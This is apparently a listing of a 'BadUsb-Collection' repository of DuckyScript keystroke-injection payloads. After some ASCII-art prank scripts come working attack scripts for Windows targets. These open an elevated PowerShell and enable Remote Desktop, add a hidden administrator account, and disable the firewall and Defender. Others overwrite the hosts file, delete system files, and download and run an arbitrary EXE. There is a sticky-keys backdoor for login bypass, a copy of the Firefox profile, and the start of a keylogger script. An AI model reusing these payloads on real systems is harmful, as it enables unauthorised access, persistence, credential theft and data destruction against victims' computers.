62	+	STRING *****++++++++++++++++++++++++++++#####********#######%%#####*******#%*#=
63	+	ENTER
64	+	STRING =#****++++++++++++++++++++++++####*******###%%%%%#############********%##=
65	+	ENTER
66	+	STRING :#***++++++++++++++++++++++#%#****##%%%%#####################**#%*-
67	+	ENTER
68	+	STRING .%***++++++++++++++++++++++%#*#%%%%############################****@*#
69	+	ENTER
70	+	STRING #****+++++++++++++++++++++#%%%################################****@*#
71	+	ENTER
72	+	STRING =*****+++++++++++++++++++++@%%%###############################****@*#:
73	+	ENTER
74	+	STRING .#*****+++++++++++++++++++++%##%#%#############################*******@*#:
75	+	ENTER
76	+	STRING *******++++++++++++++++++++%*%%%############################*****%##-
77	+	ENTER
78	+	STRING :%******++++++++++++++++++++%**#%%#######################********##*=
79	+	ENTER
80	+	STRING -#*****+++++++++++++++++++++###%####################**********#%*+
81	+	ENTER
82	+	STRING -#******+++++++++++++++++++++%#**%%################*************@*+
83	+	ENTER
84	+	STRING -#******++++++++++++++++++++++%***#%#########****************@*+
85	+	ENTER
86	+	STRING .*******++++++++++++++++++++++##**#%###***********************@*+
87	+	ENTER
88	+	STRING =#******++++++++++++++++++++++###***###********************%#*=
89	+	ENTER
90	+	STRING +#*******++++++++++++++++++++++###***####************####**#-
91	+	ENTER
92	+	STRING :+#*******+++++++++++++++++++++++###****################******#.
93	+	ENTER
94	+	STRING .+#********+++++++++++++++++++++++####*********************##%.
95	+	ENTER
96	+	STRING :+#*****+++++++++++++++++++++++++########################-
97	+	ENTER
98	+	STRING .:=++##*++++++++++++++++++++++++++++++++++++++++**-
99	+	ENTER
100	+	STRING .:-==+#++++++++++++++++++++++++++++***+=-.
101	+	ENTER
102	+	STRING .::--==++++++++++++=========--:.

■ ■ ■ ■ ■ ■

BadUsb-Collection/ASCII/RickRoll.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Opens Notepad and types out the ASCII art
3	+	REM Version: 1.0
4	+	REM Category: ASCII
5	+	DELAY 1200
6	+	GUI r
7	+	DELAY 600
8	+	STRING notepad
9	+	ENTER
10	+	DELAY 750
11	+	GUI UPARROW
12	+	DELAY 500
13	+	STRING K00KKKKKKKKOOOOOOOOOOO0KKKKXKK00O000OOOOOOkkkkOO0KKKKKKXKKKKXKKKKK0OkxxkxxxxxxkO000KKKKKKKK000000000
14	+	ENTER
15	+	STRING 0000OO0O0OOOO000OO0000KKKK000OkkkkkkkkxxxxkkkkxkkkkkkOO00OOO00KKKKK0OkxxxxxxxxxkO00KKKKKKKKKK0000000
16	+	ENTER
17	+	STRING KKK0000OOOOOO0000000000OOOkkkkkOOOOkkkkkkxoolcclc:;;:clodkOOkkOOOOOOOkxxxxxkkkxxkkOOO000O00000000000
18	+	ENTER
19	+	STRING XXXXXXXKKKKK00000000000000OOkOOOOOkkkkkOOo:,'',,,,,,,',,:ldkkkkkkxxxxxxxxxkkkkxxkxxkkOOOO00KKKXK00KK
20	+	ENTER
21	+	STRING XXXXXXXXXNNXXK00000000KKXKKK00OOkkkOkkkkdl;,'.'..''''''',;;lxOkOOOkkkkxxkkkkkkkkkkkO0KKKKKXNNNNXK0KX
22	+	ENTER
23	+	STRING XXXXXXXNNNNXKK000000000KXXXXKKKOOOO0OOOkoc:;;;,,',,,,,,,,,,;lO00K000OkkkkkkkkO00KKKKXKXXXXXNNNNNX00K
24	+	ENTER
25	+	STRING XNNXXXXXKKKK00000000KK00KKKKK000OOO00kdloolooodoooddddool;,,cOKK000OkkkkkkkkkkO0KKKKXXXXXXXXNNNNK000
26	+	ENTER
27	+	STRING XXXXKK000000KXK0000KKK0000OOOOOOOkkkkd:codlloddddxxxxxxxxl;,lkOOkkkkkkkkxkkkkkkOO000KKKXXXXXNNNNXK00
28	+	ENTER
29	+	STRING K0K0000000KXXXK00000KXK0000000000Okkkdcldolccloddddxxxkxxo:;lkkkkxxxk00kxkkkkkkkkkkkk00KXKXXXNNNNNXK
30	+	ENTER
31	+	STRING 000000000XXNNX000000K0000KXXXXXXXK0Okkdddl::::codolllodddo::x0OkkkxxkOOkxkkkkOOOkkkkkkOO000KXNNNXXXX
32	+	ENTER
33	+	STRING KKKK0000KXNNNXKK000000KKKXNNNNXXXXX0xkOkdllccccoxxdolloodlcx0KKKKOkxxkkkkkkkkO000OkkkkkkkkOO0XXXXXXK
34	+	ENTER
35	+	STRING XXNXXKKKKXNWNXKKKKKKKXNNNNNNXXXXXXXOodOkolllllloxxxxxxxxdooOKKKKKKOOkkkkkkkkkOK000kkkkkkkkkkOO0KKXKK
36	+	ENTER
37	+	STRING XNNXXNXKKKXNNXKKKKKKKKNNNNNNXXXXXXX0xdkkollllccoddxxxxxxdddOKKKKKK0K0OkkkkkkkOKKKOkkkkO000OkkkkkO0KK
38	+	ENTER
39	+	STRING XXXXKK00KKKKKKK00K000KXNNNNNNNXXXXXK0O0kolllllodxxxxxxxddxk0KKK0KK0K0kkxxkkkkO00OkkOO000000OkkkkkkkO
40	+	ENTER
41	+	STRING KXXK000KXXXK0K000K00KXNWNNNNNNXXXXXK0KKkollcccloddddxxxkOOKK0KK0KK0K0kxxxxkkxkkkkkkkOO000K00OOkkkkkk
42	+	ENTER
43	+	STRING 00000KXNNNNNKK0000000KNNNNNNNNXXXXXK000kdollloodxxxdddx0K0KK0KK0KK0KKOkxxxxxxxxk00OkkkOKKK0OOkkOOOOO
44	+	ENTER
45	+	STRING 00000XNNNNNNXK0000000000KNNXNNXXXK0Okkkdolllclodddddddk000KK0KK0K000Okkxxxxxxkk000K0OkO000Okkkk00K0O
46	+	ENTER
47	+	STRING XXK00XNNNNNNX00000KKK0000KXXNNXXKOkkkkkdllccccclooodddxdxO0KKKKKK0OkkkkkkxxxxkO0KKKKK0OOOOOOOkkO00Ok
48	+	ENTER
49	+	STRING XNNK0KXNNNNNK00000KXNXK00OO00000Okkkkkkdllllloddddxddkx:;lx00K00OkkxkkOOkxxkkkO0KKKKK0O0KKXK0Okkkkkk
50	+	ENTER
51	+	STRING XXNK00XNNXNNK000000KK000OOOOkkkkkkOOOxooolllloodddddkOo'..';loddxxxkO00OkkkkkkO000KKKOOKXXXKK0OkkkO0
52	+	ENTER
53	+	STRING XXXX0OKXXXXXKOOOOO00OOO00KK0OOxxdxkOOxoodoollooooxxk0Oc.......'';::cllodxxkkkkO000KK0O0KXXXXK0OkkkO0
54	+	ENTER
55	+	STRING XXXXKO0KXXXX0OOOOOOOOO0KK0Oxol:;:okOOkooooolllodkO00Oo,................',;:cldO00000Ok0XXKXK0kkxkkkk
56	+	ENTER
57	+	STRING KXXXKOO00KXKOkkkkOOOOkkxoc:,'...'lkkkxlccclddxkOO00kl'.......................,oO0000kk0KKKX0kkkkkxxk
58	+	ENTER
59	+	STRING 0KK00OOOOOO0Okkkkkkdl:;,'.......'cxxddc:ccoxkOO00xo:..........................,d0OOkkk0KKK0kkxO0OOkx
60	+	ENTER
61	+	STRING OOOOO0KKK0OOOkkkkkx:.............',':lc::clolodxd:,............................lOkkkkkkO00kxkkO000Ox
62	+	ENTER
63	+	STRING kOOO0XXXXXX0OOOkkkd;................;cc::cloooll:'.............................'okOOOkxkkkxxkO0KKKOk
64	+	ENTER
65	+	STRING kkO0KXXXXNNKOOOkkko,................;cccccllllc:,...............................,dO00OkkxxxxxkkOO0Ok
66	+	ENTER
67	+	STRING kkkOKXXXXXXKOOOkkko'................;cloolccc::;................................,dOO0OOkkxxxxkkkkkkk
68	+	ENTER
69	+	STRING kkkkO0XKKXX0Okkkkko,................;cldxoc::;;'.................................cxOOOOkkkxxkO0000Ok
70	+	ENTER
71	+	STRING OkkkkOKKKXX0Okkkkxl'................;:oxxo:;;;,...................................;k0Okkkkkkkk0KKXK0
72	+	ENTER
73	+	STRING 0kkkkO0KXXX0OOkkkx:.................';lxkl;;;;,......................... .......:dxkkkOOOkk0XXXXX
74	+	ENTER
75	+	STRING 00OkkOO0KXX0OOkkkx:.................',:loc;:::'........''.............. .........':okO00OkOKXXXN
76	+	ENTER
77	+	STRING KKOkOOOOKXX0OOkkkx:..................,;::::::;.........:llolcccc:'..... .. .........;lk00OkOKXXX
78	+	ENTER
79	+	STRING OOkkO0OO0KX0OOkkkx:..... ............;:c::::;'.........:::clllllol;..... . ..........';okkk0KXX
80	+	ENTER
81	+	STRING xkkk0K0OO0KOkkkkkkl.... ............;:::;;;,..........';:cllllllol:.... ..............:xkk0KK
82	+	ENTER
83	+	STRING xkkkO0K0OOOOkkkkkko.... ...........,;;;,,,'...........';:ccllllloo:........................;xkkO0K
84	+	ENTER
85	+	STRING OO00OOOOkkkkkkkxxkc..... ..........',;;,''.............';:ccllllooc'.......................;xkxk0K
86	+	ENTER
87	+	STRING 00KKK0Okkkkkkkxxxxc..... ..........,;;,,,......... .........,;cllc,.......................'oxxxOO
88	+	ENTER
89	+	STRING 000KK0OOOkkkkkxxxd;........ .........';;,,,... ..,,'.. ......................:dxxxx
90	+	ENTER
91	+	STRING 000K0K000Okkkxxxxd:,,'...,:ccllc::;'..,;;;;,. ..,;,................:dddxx
92	+	ENTER
93	+	STRING OO00OO000Okkkxxxxxo,...,clolcc::;;,...,;;;,'. . ..................,cdddddx
94	+	ENTER
95	+	STRING O0000000Okkxxxxxdxo,..,,':l:;;;;;;,...,;;,'.. .'''........'',;:oxkxddodd
96	+	ENTER
97	+	STRING OOO0OOkkkxxxxxxxddd:''...';;;;;;;;'...,,,'.. ... .cddoollloodxxxkkkkkxdoood
98	+	ENTER
99	+	STRING OO0Okxxxxxxxxxxdddddc,....',;;,;;,. .'',,... .... .,dddxxxddddxxxxkxxdoooooo
100	+	ENTER
101	+	STRING kkkxxxxxxxxxddddddxdolc:,...',,''.. ..',,... ..'lddxxddddddxxxxxdooooooo
102	+	ENTER
103	+	STRING dddddxkkkxddddddddxkdoooc;'..... ..''.. .......cddddddddddddddddoddoooo
104	+	ENTER
105	+	STRING ooddxkkOkxdddddddxxkkxdooollc:,. .''. .........;dddddddddddddooodddoooo
106	+	ENTER
107	+	STRING oodxkkkkkxddddddddxkkkkdollool,... .''','.. .........,lddddddddddddddddddoooo
108	+	ENTER
109	+	STRING oodxkkkkkdddddddodxxxxxdollol:......,;;,,'. .........:oooddddddddoodddddoooo
110	+	ENTER
111	+	STRING ooodxxkkxddddoooodxkkxdollllc;......,;;,,'. .........,looooooooooooooddooooo
112	+	ENTER
113	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/ASCII/SimpleTroll.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Opens Notepad and types out the ASCII art
3	+	REM Version: 1.0
4	+	REM Category: ASCII
5	+	DELAY 2000
6	+	GUI r
7	+	DELAY 500
8	+	STRING notepad
9	+	ENTER
10	+	DELAY 1000
11	+	GUI UPARROW
12	+	DELAY 500
13	+	STRING _ _ _____ _ ________ _____ ______ __ _ _ _ _ _____ ______ ________ _____ ______ _____
14	+	ENTER
15	+	STRING \| \| \| \| /\ / ____\| \|/ / ____\| __ \ \| _ \ \ / / \| \| \| \| \ \| \|/ ____/ __ \ \ / / ____\| __ \\| ____\| __ \
16	+	ENTER
17	+	STRING \| \|__\| \| / \ \| \| \| ' /\| \|__ \| \| \| \| \| \|_) \ \_/ / \| \| \| \| \\| \| \| \| \| \| \ \ / /\| \|__ \| \|__) \| \|__ \| \| \| \|
18	+	ENTER
19	+	STRING \| __ \| / /\ \\| \| \| < \| __\| \| \| \| \| \| _ < \ / \| \| \| \| . ` \| \| \| \| \| \|\ \/ / \| __\| \| _ /\| __\| \| \| \| \|
20	+	ENTER
21	+	STRING \| \| \| \|/ ____ \ \|____\| . \\| \|____\| \|__\| \| \| \|_) \| \| \| \| \|__\| \| \|\ \| \|___\| \|__\| \| \ / \| \|____\| \| \ \\| \|____\| \|__\| \|
22	+	ENTER
23	+	STRING \|_\| \|_/_/ \_\_____\|_\|\_\______\|_____/ \|____/ \|_\| \____/\|_\| \_\|\_____\____/ \/ \|______\|_\| \_\______\|_____/
24	+	ENTER
25	+	DELAY 2000
26	+	CTRL HOME
27	+	DELAY 2000
28	+	CTRL END

■ ■ ■ ■ ■ ■

BadUsb-Collection/Execution/ActivateRDP.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Activates Remote Desktop.
3	+	REM Version: 1.0
4	+	REM Category: Execution
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 1500
8	+	WINDOWS r
9	+	DELAY 1500
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 750
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 1200
16	+	ALT y
17	+	DELAY 1200
18	+	GUI UP
19	+	DELAY 1200
20	+	STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0;Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 1;netsh advfirewall firewall set rule group='remote desktop - remotefx' new enable=Yes;netsh advfirewall firewall set rule group='remote desktop' new enable=Yes; exit
21	+	ENTER
22	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/Execution/Create_New_Windows_Admin.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Create a new Windows-User with Admin perms.
3	+	REM Version: 1.0
4	+	REM Category: Execution
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 1500
8	+	WINDOWS r
9	+	DELAY 1500
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 560
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 560
16	+	ALT y
17	+	DELAY 300
18	+	STRING Net User root toor /ADD;Net LocalGroup Administrators root /ADD;Net LocalGroup Administrator root /ADD;Net LocalGroup Administratoren root /ADD;reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v root /t REG_DWORD /d 0 /f; exit
19	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/Execution/DNS_Cache_Poison.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Poisons the DNS Cache. (https://www.cloudflare.com/learning/dns/dns-cache-poisoning/)
3	+	REM Version: 1.0
4	+	REM Category: Execution
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 750
8	+	WINDOWS r
9	+	DELAY 800
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 750
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 870
16	+	ALT y
17	+	DELAY 790
18	+	STRING $redirectionAddress="IP ADRESS HERE";$redirectedSite="URL HERE";$hosts1 = $redirectionAddress + ' ' + $redirectedSite + ([Environment]::NewLine);$hosts2 = $redirectionAddress + ' www.' + $redirectedSite;$hoststotal = $hosts1 + $hosts2;[io.file]::writealltext("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS", $hoststotal); exit
19	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/Execution/Delete_System_32.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Deletes System 32...
3	+	REM Version: 1.0
4	+	REM Category: Execution
5	+	DELAY 750
6	+	GUI r
7	+	DELAY 600
8	+	STRING cmd
9	+	CTRL-SHIFT ENTER
10	+	DELAY 1500
11	+	ALT y
12	+	DELAY 800
13	+	STRING takeown /f * /r /a /d y && icacls * /inheritance:r /grant:r administrators:(F) /t & del /f /q *
14	+	ENTER
15	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/Execution/DisableFirewall.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Disables the Windows-Firewall.
3	+	REM Version: 1.0
4	+	REM Category: Execution
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 850
8	+	WINDOWS r
9	+	DELAY 900
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 750
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 900
16	+	ALT y
17	+	DELAY 900
18	+	STRING netsh advfirewall set allprofiles state off; exit
19	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/Execution/Disable_WinDefender.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Disables Windows Defender.
3	+	REM Version: 1.0
4	+	REM Category: Execution
5	+	DELAY 1500
6	+	CTRL ESC
7	+	DELAY 750
8	+	STRING windows security
9	+	DELAY 250
10	+	ENTER
11	+	DELAY 1000
12	+	ENTER
13	+	DELAY 500
14	+	TAB
15	+	DELAY 100
16	+	TAB
17	+	DELAY 100
18	+	TAB
19	+	DELAY 100
20	+	TAB
21	+	DELAY 100
22	+	ENTER
23	+	DELAY 500
24	+	SPACE
25	+	DELAY 1000
26	+	ALT y
27	+	DELAY 1000
28	+	ALT F4
29	+	DELAY 500
30	+	GUI r
31	+	DELAY 500
32	+	STRING powershell
33	+	CTRL-SHIFT ENTER
34	+	DELAY 1000
35	+	ALT y
36	+	DELAY 1000
37	+	STRING Add-MpPreference -ExclusionPath “C:”
38	+	ENTER
39	+	DELAY 2000
40	+	STRING EXIT
41	+	ENTER
42	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/Execution/DownloadAnyEXE.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Downloads an .exe file from the URL and runs it on the target pc.
3	+	REM Version: 1.0
4	+	REM Category: Execution
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 950
8	+	WINDOWS r
9	+	DELAY 650
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 750
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 850
16	+	ALT y
17	+	DELAY 1200
18	+	STRING $url = "URL TO EXE"; $output = "C:\windows\41281687.exe"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath "C:\windows\41281687.exe"; exit
19	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/Execution/OpenAnyPort.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Open any TCP or UDP Port on the target PC.
3	+	REM Version: 1.0
4	+	REM Category: Execution
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 850
8	+	WINDOWS r
9	+	DELAY 850
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 800
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 900
16	+	ALT y
17	+	DELAY 900
18	+	STRING netsh advfirewall firewall add rule name=Firewall entry name dir=in action=allow protocol=TCP or UDP localport=Port Number; exit
19	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/Execution/RemoveWindowsUpdate.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Remove any Windows Update. Please put in the update number you want to remove. Example: KB27475
3	+	REM Version: 1.0
4	+	REM Category: Execution
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 1500
8	+	WINDOWS r
9	+	DELAY 1500
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 750
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 1500
16	+	ALT y
17	+	DELAY 1500
18	+	GUI UP
19	+	DELAY 1500
20	+	STRING $input="UPDATE NUMBER";$input = $input.Replace('KB', '');$cmdString = 'wusa /quiet /norestart /uninstall /kb:' + $input;Invoke-Expression -Command $cmdString; exit
21	+	ENTER
22	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/Execution/StartWifiAccessPoint.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Connect to a Wifi (example Evil Twin) to sniff packets or what you wanna do.
3	+	REM Version: 1.0
4	+	REM Category: Execution
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 1500
8	+	WINDOWS r
9	+	DELAY 1500
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 750
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 1200
16	+	ALT y
17	+	DELAY 1200
18	+	GUI UP
19	+	DELAY 1200
20	+	STRING netsh wlan set hostednetwork ssid=WLAN NAME key=PASSWORD;netsh wlan start hostednetwork; exit
21	+	ENTER
22	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/Execution/StickyKeysSWAP.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Switch cmd.exe with sethc.exe, allowing to get access to target pc without knowing the pin.
3	+	REM Version: 1.0
4	+	REM Category: Execution
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 1500
8	+	WINDOWS r
9	+	DELAY 1500
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 750
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 1500
16	+	ALT y
17	+	DELAY 1500
18	+	GUI UP
19	+	DELAY 1500
20	+	STRING copy c:\windows\system32\sethc.exe c:\;$acl = Get-Acl c:\windows\system32\sethc.exe;$AccessRule1 = New-Object System.Security.AccessControl.FileSystemAccessRule("Jeder","FullControl","Allow");$AccessRule2 = New-Object System.Security.AccessControl.FileSystemAccessRule("Everyone","FullControl","Allow");$acl.SetAccessRule($AccessRule1);$acl \| Set-Acl c:\windows\system32\sethc.exe;$acl.SetAccessRule($AccessRule2);$acl \| Set-Acl c:\windows\system32\sethc.exe;Copy-Item -Path c:\windows\system32\cmd.exe -Destination c:\windows\system32\sethc.exe -Recurse -force; exit
21	+	ENTER
22	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/Exfiltration/ExfilFirefox.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Exfiltrate Firefox profile and store to path. Change destination Path at the very end of the string.
3	+	REM Version: 1.0
4	+	REM Category: Exfiltration
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 1500
8	+	WINDOWS r
9	+	DELAY 1500
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 750
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 1200
16	+	ALT y
17	+	DELAY 1200
18	+	GUI UP
19	+	DELAY 1200
20	+	STRING $ErrorActionPreference = "SilentlyContinue";$folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-26528702.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$fireSaveDir = New-Item $userDir'\WGD\FireFox-Profile' -ItemType Directory;$fireDir = (Get-ChildItem env:userprofile).value + '\AppData\Roaming\Mozilla\Firefox\Profiles';Copy-Item $fireDir -Destination $fireSaveDir -Recurse;Start-Sleep -s 10;$Report >> $fileSaveDir'/ComputerInfo-26528702.html';Compress-Archive -Path $fileSaveDir -DestinationPath PATH\results-26528702.zip ; exit
21	+	ENTER
22	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/Exfiltration/General_PC_Information.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Saves some general Information about the target pc to a file.
3	+	REM Version: 1.0
4	+	REM Category: Exfiltration
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 900
8	+	WINDOWS r
9	+	DELAY 900
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 750
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 900
16	+	ALT y
17	+	DELAY 900
18	+	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss'); $userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime; $fileSaveDir = New-Item ($userDir) -ItemType Directory; $date = get-date; $style = '<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>'; $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-34231960.html'; $Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"; $SysBootTime = Get-WmiObject Win32_OperatingSystem; $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)\| ConvertTo-Html datetime; $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME); $SerialNo = $SysSerialNo.SerialNumber; $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 \| Select Manufacturer,Model; $SysManufacturer = $SysInfo.Manufacturer; $SysModel = $SysInfo.Model; $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption; $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'"; $HD = [math]::truncate($disk.Size / 1GB); $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB); $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME \| Select TotalVisibleMemorySize; $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB); $SysCpu = Get-WmiObject Win32_Processor \| Select Name; $Cpu = $SysCpu.Name; $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME \| select SerialNumber; $HardSerialNo = $HardSerial.SerialNumber; $SysCdDrive = Get-WmiObject Win32_CDROMDrive \|select Name; $graphicsCard = gwmi win32_VideoController \|select Name; $graphics = $graphicsCard.Name; $SysCdDrive = Get-WmiObject Win32_CDROMDrive \|select -first 1; $DriveLetter = $CDDrive.Drive; $DriveName = $CDDrive.Caption; $Disk = $DriveLetter + '\' + $DriveName; $Firewall = New-Object -com HNetCfg.FwMgr; $FireProfile = $Firewall.LocalPolicy.CurrentProfile; $FireProfile = $FireProfile.FirewallEnabled; $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>"; $Report >> $fileSaveDir'/ComputerInfo-34231960.html';Compress-Archive -Path $fileSaveDir -DestinationPath PATH TO SAVE FILE HERE\Gather_Informationresults-34231960.zip ; exit
19	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/Exfiltration/GetAllComputerInfo.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Simple Powershell script that stores alot of Info about the PC into a file. For more info read the comments (REM) in the code below.
3	+	REM Version: 1.0
4	+	REM Category: Exfiltration
5	+	DELAY 1000
6	+	GUI r
7	+	DELAY 450
8	+	REM Start Powershell as Admin
9	+	STRING powershell Start-Process powershell -Verb runAs
10	+	DELAY 500
11	+	ENTER
12	+	DELAY 600
13	+	LEFTARROW
14	+	DELAY 600
15	+	ENTER
16	+	DELAY 750
17	+	REM Change the "Path" to your path ("C:\...").
18	+	STRING $Path = "PATH"
19	+	DELAY 500
20	+	ENTER
21	+	DELAY 500
22	+	REM Creates the Results.txt file to the path
23	+	STRING New-Item -Path "$Path\Results.txt" -ItemType File
24	+	DELAY 500
25	+	ENTER
26	+	DELAY 700
27	+	REM Gets all the Info about the PC and stores them into the created Results.txt file
28	+	STRING Get-ComputerInfo \| Out-File -FilePath "$Path\Results.txt"
29	+	DELAY 300
30	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/Exfiltration/Keylogger.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: This script allows you to inject a software keylogger in victim's PC
3	+	REM Version: 1.0
4	+	REM Category: Exfiltration
5	+	DELAY 2500
